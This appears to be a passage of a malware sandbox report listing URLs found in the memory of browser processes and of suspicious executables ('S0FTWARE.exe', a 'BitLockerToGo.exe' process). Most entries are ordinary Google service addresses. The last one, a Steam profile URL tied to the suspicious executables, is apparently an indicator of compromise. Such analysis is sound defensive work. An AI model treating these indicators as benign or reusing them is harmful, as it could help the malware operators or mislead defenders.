                        Source: chrome.exe, 00000005.00000002.2740718077.000007C00102C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=en3
                        Source: chrome.exe, 00000005.00000002.2737959031.000007C000C54000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=end
                        Source: chrome.exe, 00000005.00000003.2657846639.000007C000CD8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2658707564.000007C000CF0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2657810354.000007C00033C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2651375363.000007C000CD8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2655499998.000007C000CF0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2653389180.000007C000EE4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstoreLDDiscover
                        Source: chrome.exe, 00000005.00000002.2751469284.0000331800920000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chromekanonymity-pa.googleapis.com/
                        Source: chrome.exe, 00000005.00000003.2642824115.000033180071C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2642960372.0000331800728000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2675421936.000007C0012E0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chromekanonymity-pa.googleapis.com/2%
                        Source: chrome.exe, 00000005.00000002.2751469284.0000331800920000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chromekanonymityauth-pa.googleapis.com/
                        Source: chrome.exe, 00000005.00000003.2642824115.000033180071C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2642960372.0000331800728000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2675421936.000007C0012E0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chromekanonymityauth-pa.googleapis.com/2$
                        Source: chrome.exe, 00000005.00000002.2751469284.0000331800920000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chromekanonymityauth-pa.googleapis.com/KAnonymityServiceJoinRelayServerhttps://chromekanonym
                        Source: chrome.exe, 00000005.00000002.2751469284.0000331800920000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chromekanonymityquery-pa.googleapis.com/
                        Source: chrome.exe, 00000005.00000003.2642824115.000033180071C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2642960372.0000331800728000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2675421936.000007C0012E0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chromekanonymityquery-pa.googleapis.com/2O
                        Source: chrome.exe, 00000005.00000002.2731576572.000007C00020C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chromereporting-pa.googleapis.com/v1/events
                        Source: chrome.exe, 00000005.00000002.2731576572.000007C00020C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chromereporting-pa.googleapis.com/v1/record
                        Source: chrome.exe, 00000005.00000002.2730625918.000007C00001C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000002.2829522376.00007CF00016C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chromewebstore.google.com/
                        Source: chrome.exe, 00000005.00000002.2738139914.000007C000CA0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chromium-i18n.appspot.com/ssl-aggregate-address/
                        Source: chrome.exe, 00000005.00000002.2731495740.000007C0001D4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://classroom.googleapis.com/
                        Source: chrome.exe, 00000005.00000002.2731495740.000007C0001D4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://classroom.googleapis.com/g
                        Source: chrome.exe, 00000005.00000003.2635622037.00000014002D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2635638475.00000014002E4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://clients2.google.com/cr/report
                        Source: chrome.exe, 00000005.00000002.2734122101.000007C0006B5000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2730625918.000007C00001C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2734414204.000007C000718000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000002.2828515754.00007CF000040000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://clients2.google.com/service/update2/crx
                        Source: chrome.exe, 00000005.00000002.2735222773.000007C00085C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://clients3.google.com/cast/chromecast/home/wallpaper/collection-images?rt=b
                        Source: chrome.exe, 00000005.00000002.2735222773.000007C00085C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://clients3.google.com/cast/chromecast/home/wallpaper/collections?rt=b
                        Source: chrome.exe, 00000005.00000002.2737001445.000007C000A64000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://clients3.google.com/cast/chromecast/home/wallpaper/image?rt=b
                        Source: chrome.exe, 00000005.00000002.2731495740.000007C0001D4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://clients4.google.com/chrome-sync
                        Source: chrome.exe, 00000005.00000002.2731495740.000007C0001D4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://clients4.google.com/chrome-sync/event
                        Source: chrome.exe, 00000005.00000002.2733918596.000007C000668000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://clientservices.googleapis.com/chrome-variations/seed?osname=win&channel=stable&milestone=117
                        Source: BitLockerToGo.exe, 00000003.00000002.3358442703.0000000002F37000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.3358442703.0000000002E88000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
                        Source: BitLockerToGo.exe, 00000003.00000002.3358442703.0000000002F37000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.3358442703.0000000002E88000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/u1AuJcj32cbVUf9NjMipLXEYwu2uFIt4lsj-ccwVqEs.36904.jpg
                        Source: chrome.exe, 00000005.00000002.2737208033.000007C000AC8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://csp.withgoogle.com/csp/report-to/gws/none
                        Source: chrome.exe, 00000005.00000002.2732018060.000007C000310000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.goog
                        Source: chrome.exe, 00000005.00000002.2732018060.000007C000310000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.googl0
                        Source: chrome.exe, 00000005.00000002.2732018060.000007C000310000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/
                        Source: chrome.exe, 00000005.00000002.2731495740.000007C0001D4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2741038731.000007C0010F8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/document/
                        Source: chrome.exe, 00000005.00000002.2738970737.000007C000DCC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2734122101.000007C0006B8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/document/:
                        Source: chrome.exe, 00000005.00000002.2738970737.000007C000DCC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2740880213.000007C0010C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2734122101.000007C0006B8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2738139914.000007C000CA0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/document/?usp=installed_webapp
                        Source: chrome.exe, 00000005.00000002.2740880213.000007C0010C8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/document/?usp=installed_webappFq
                        Source: chrome.exe, 00000005.00000002.2738970737.000007C000DCC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2734122101.000007C0006B8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/document/J
                        Source: chrome.exe, 00000005.00000003.2675421936.000007C0012E0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/document/d/1z2sdBwnUF2tSlhl3R2iUlk7gvmSbuLVXOgriPIcJkXQ/preview29
                        Source: chrome.exe, 00000005.00000002.2741038731.000007C0010F8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/document/dogl
                        Source: chrome.exe, 00000005.00000002.2738970737.000007C000DCC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2734122101.000007C0006B8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2675997839.000007C00129C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2742837621.000007C001678000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/document/installwebapp?usp=chrome_default
                        Source: chrome.exe, 00000005.00000002.2742837621.000007C001678000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/document/installwebapp?usp=chrome_default0
                        Source: chrome.exe, 00000005.00000002.2742837621.000007C001678000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/document/installwebapp?usp=chrome_defaultlt
                        Source: chrome.exe, 00000005.00000003.2675997839.000007C00129C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/document/installwebapp?usp=chrome_defaultult
                        Source: chrome.exe, 00000005.00000002.2731495740.000007C0001D4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/document/njb
                        Source: chrome.exe, 00000005.00000002.2740880213.000007C0010C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2734862905.000007C0007B4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2732973511.000007C0004D0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2734911429.000007C0007D8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/document/u/0/create?usp=chrome_actions
                        Source: chrome.exe, 00000005.00000002.2740880213.000007C0010C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2734862905.000007C0007B4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2732973511.000007C0004D0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2734911429.000007C0007D8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/forms/u/0/create?usp=chrome_actions
                        Source: chrome.exe, 00000005.00000002.2740880213.000007C0010C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2734862905.000007C0007B4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2732973511.000007C0004D0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2734911429.000007C0007D8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/forms/u/0/create?usp=chrome_actionsy
                        Source: chrome.exe, 00000005.00000002.2743503663.000007C001900000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/presentation/
                        Source: chrome.exe, 00000005.00000002.2738970737.000007C000DCC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2734122101.000007C0006B8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/presentation/:
                        Source: chrome.exe, 00000005.00000002.2738970737.000007C000DCC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2740880213.000007C0010C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2734122101.000007C0006B8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2738139914.000007C000CA0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2743593433.000007C001948000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/presentation/?usp=installed_webapp
                        Source: chrome.exe, 00000005.00000002.2740880213.000007C0010C8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/presentation/?usp=installed_webappor
                        Source: chrome.exe, 00000005.00000002.2738970737.000007C000DCC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2734122101.000007C0006B8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/presentation/J
                        Source: chrome.exe, 00000005.00000002.2741717597.000007C00129C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2742837621.000007C001678000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/presentation/installwebapp?usp=chrome_default
                        Source: chrome.exe, 00000005.00000002.2743503663.000007C001900000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/presentation/ogl
                        Source: chrome.exe, 00000005.00000002.2733051632.000007C000500000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2734639165.000007C00075C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2740760153.000007C001048000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/presentation/u/0/create?usp=chrome_actions
                        Source: chrome.exe, 00000005.00000002.2741278328.000007C00119C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2737698313.000007C000BE8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/spreadsheets/
                        Source: chrome.exe, 00000005.00000002.2734122101.000007C0006B8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/spreadsheets/:
                        Source: chrome.exe, 00000005.00000002.2734122101.000007C0006B8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2738139914.000007C000CA0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2742297584.000007C00140C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/spreadsheets/?usp=installed_webapp
                        Source: chrome.exe, 00000005.00000002.2734122101.000007C0006B8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/spreadsheets/J
                        Source: chrome.exe, 00000005.00000002.2742837621.000007C001678000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/spreadsheets/installwebapp?usp=chrome_default
                        Source: chrome.exe, 00000005.00000003.2675997839.000007C00129C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/spreadsheets/installwebapp?usp=chrome_defaulteHandler
                        Source: chrome.exe, 00000005.00000002.2737698313.000007C000BE8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/spreadsheets/ogl
                        Source: chrome.exe, 00000005.00000002.2733051632.000007C000500000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2734639165.000007C00075C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2740760153.000007C001048000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/spreadsheets/u/0/create?usp=chrome_actions
                        Source: chrome.exe, 00000005.00000003.2647841528.000007C000494000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2732018060.000007C000310000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive-autopush.corp.google.com/
                        Source: chrome.exe, 00000005.00000003.2647841528.000007C000494000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive-daily-0.corp.google.com/
                        Source: chrome.exe, 00000005.00000003.2647841528.000007C000494000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive-daily-1.corp.google.com/
                        Source: chrome.exe, 00000005.00000002.2732018060.000007C000310000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive-daily-2.corp
                        Source: chrome.exe, 00000005.00000003.2647841528.000007C000494000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive-daily-2.corp.google.com/
                        Source: chrome.exe, 00000005.00000002.2732018060.000007C000310000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive-daily-3.corp.googl
                        Source: chrome.exe, 00000005.00000003.2647841528.000007C000494000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive-daily-3.corp.google.com/
                        Source: chrome.exe, 00000005.00000002.2732018060.000007C000310000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive-daily-4.c
                        Source: chrome.exe, 00000005.00000003.2647841528.000007C000494000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive-daily-4.corp.google.com/
                        Source: chrome.exe, 00000005.00000002.2732018060.000007C000310000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive-daily-5.corp.go
                        Source: chrome.exe, 00000005.00000003.2647841528.000007C000494000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive-daily-5.corp.google.com/
                        Source: chrome.exe, 00000005.00000003.2647841528.000007C000494000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2732018060.000007C000310000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive-daily-6.corp.google.com/
                        Source: chrome.exe, 00000005.00000003.2647841528.000007C000494000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive-preprod.corp.google.com/
                        Source: chrome.exe, 00000005.00000003.2647841528.000007C000494000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2732018060.000007C000310000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive-staging.corp.google.com/
                        Source: chrome.exe, 00000005.00000003.2657711015.000007C001110000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive-thirdparty.googleusercontent.com/32/type/
                        Source: chrome.exe, 00000005.00000003.2647841528.000007C000494000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2732018060.000007C000310000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/
                        Source: chrome.exe, 00000005.00000002.2736924847.000007C000A24000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2734122101.000007C0006B8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/:
                        Source: chrome.exe, 00000005.00000002.2743503663.000007C001900000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2739080303.000007C000DE8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2736924847.000007C000A24000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2734122101.000007C0006B8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/?lfhs=2
                        Source: chrome.exe, 00000005.00000002.2739080303.000007C000DE8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/?lfhs=2/
                        Source: chrome.exe, 00000005.00000002.2743503663.000007C001900000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/?lfhs=2ation.Result0
                        Source: chrome.exe, 00000005.00000002.2743503663.000007C001900000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/?lfhs=2d(0
                        Source: chrome.exe, 00000005.00000002.2736924847.000007C000A24000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2734122101.000007C0006B8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/J
                        Source: chrome.exe, 00000005.00000002.2736924847.000007C000A24000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2733664269.000007C00060C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2742527483.000007C0015AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2734122101.000007C0006B8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/drive/installwebapp?usp=chrome_default
                        Source: chrome.exe, 00000005.00000002.2742895899.000007C001690000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/k
                        Source: chrome.exe, 00000005.00000002.2731495740.000007C0001D4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2737959031.000007C000C54000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/?q=
                        Source: chrome.exe, 00000005.00000002.2731495740.000007C0001D4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/?q=searchTerms
                        Source: msedge.exe, 00000009.00000003.2766795323.00007CF000264000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.2767180241.00007CF00026C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/AddSession
                        Source: msedge.exe, 00000009.00000003.2766795323.00007CF000264000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.2767180241.00007CF00026C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/Logout
                        Source: msedge.exe, 00000009.00000003.2766795323.00007CF000264000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.2767180241.00007CF00026C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/LogoutYxABzen
                        Source: msedge.exe, 00000009.00000003.2766795323.00007CF000264000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.2767180241.00007CF00026C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/OAuthLogin
                        Source: msedge.exe, 00000009.00000003.2766795323.00007CF000264000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.2767180241.00007CF00026C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/chrome/blank.html
                        Source: msedge.exe, 00000009.00000003.2766795323.00007CF000264000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.2767180241.00007CF00026C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/oauth/multilogin
                        Source: msedge.exe, 00000009.00000003.2766795323.00007CF000264000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.2767180241.00007CF00026C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/reauth/v1beta/users/
                        Source: msedge.exe, 00000009.00000003.2766795323.00007CF000264000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.2767180241.00007CF00026C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/v1/issuetoken
                        Source: chrome.exe, 00000005.00000003.2654430117.000007C000FE4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2736405653.000007C0009A4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2654311777.000007C000F24000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://photos.google.com/settings?referrer=CHROME_NTP
                        Source: chrome.exe, 00000005.00000003.2657579203.000007C00043C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2657913534.000007C00120C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2657711015.000007C001110000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://photos.google.com?referrer=CHROME_NTP
                        Source: chrome.exe, 00000005.00000002.2736405653.000007C0009A4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2654311777.000007C000F24000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://policies.google.com/
                        Source: chrome.exe, 00000005.00000003.2675421936.000007C0012E0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://publickeyservice.gcp.privacysandboxservices.com
                        Source: chrome.exe, 00000005.00000003.2675421936.000007C0012E0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://publickeyservice.pa.aws.privacysandboxservices.com
                        Source: chrome.exe, 00000005.00000003.2675421936.000007C0012E0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://publickeyservice.pa.aws.privacysandboxservices.com/.well-known/protected-auction/v1/public-k
                        Source: chrome.exe, 00000005.00000003.2675421936.000007C0012E0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://publickeyservice.pa.gcp.privacysandboxservices.com
                        Source: chrome.exe, 00000005.00000003.2675421936.000007C0012E0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://publickeyservice.pa.gcp.privacysandboxservices.com/.well-known/protected-auction/v1/public-k
                        Source: chrome.exe, 00000005.00000002.2730898591.000007C0000B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://safebrowsing.google.com/safebrowsing/clientreport/chrome-sct-auditing
                        Source: chrome.exe, 00000005.00000002.2730718664.000007C000058000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://sctauditing-pa.googleapis.com/v1/knownscts/length/$1/prefix/$2?key=AIzaSyBOti4mM-6x9WDnZIjIe
                        Source: BitLockerToGo.exe, 00000003.00000002.3359198623.0000000003195000.00000004.00000020.00020000.00000000.sdmp, AAFIJKKEHJ.exe, 00000014.00000003.3288077663.000001C489480000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://sectigo.com/CPS0
                        Source: chrome.exe, 00000005.00000002.2731495740.000007C0001D4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://securitydomain-pa.googleapis.com/v1/
                        Source: chrome.exe, 00000005.00000003.2675421936.000007C0012E0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://shieldedids-pa.googleapis.com2
                        Source: chrome.exe, 00000005.00000003.2675421936.000007C0012E0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://shieldedids-pa.googleapis.comJv
                        Source: chrome.exe, 00000005.00000002.2740880213.000007C0010C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2734862905.000007C0007B4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2732973511.000007C0004D0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2734911429.000007C0007D8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://sites.google.com/u/0/create?usp=chrome_actions
                        Source: chrome.exe, 00000005.00000002.2740880213.000007C0010C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2734862905.000007C0007B4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2732973511.000007C0004D0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://sites.google.com/u/0/create?usp=chrome_actionsactions
                        Source: chrome.exe, 00000005.00000002.2734911429.000007C0007D8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://sites.google.com/u/0/create?usp=chrome_actionsactionsA
                        Source: chrome.exe, 00000005.00000002.2732518022.000007C0003F3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ssl.gstatic.com
                        Source: chrome.exe, 00000005.00000002.2732762663.000007C00040C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2686584935.000007C001CE8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2686757739.000007C001D04000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2686922583.000007C001DBC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ssl.gstatic.com/gb/images/bar/al-icon.png
                        Source: S0FTWARE.exe, 00000000.00000003.2190648021.0000000013764000.00000004.00001000.00020000.00000000.sdmp, S0FTWARE.exe, 00000000.00000003.2190577336.00000000137EE000.00000004.00001000.00020000.00000000.sdmp, S0FTWARE.exe, 00000000.00000002.2247124098.000000001376C000.00000004.00001000.00020000.00000000.sdmp, S0FTWARE.exe, 00000000.00000002.2247358214.0000000013A5C000.00000004.00001000.00020000.00000000.sdmp, S0FTWARE.exe, 00000000.00000002.2246493920.0000000013471000.00000004.00001000.00020000.00000000.sdmp, S0FTWARE.exe, 00000000.00000003.2190136482.000000001387E000.00000004.00001000.00020000.00000000.sdmp, S0FTWARE.exe, 00000000.00000002.2247221901.0000000013880000.00000004.00001000.00020000.00000000.sdmp, BitLockerToGo.exe, BitLockerToGo.exe, 00000003.00000002.3357729051.0000000002A31000.00000002.00000400.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199801589826
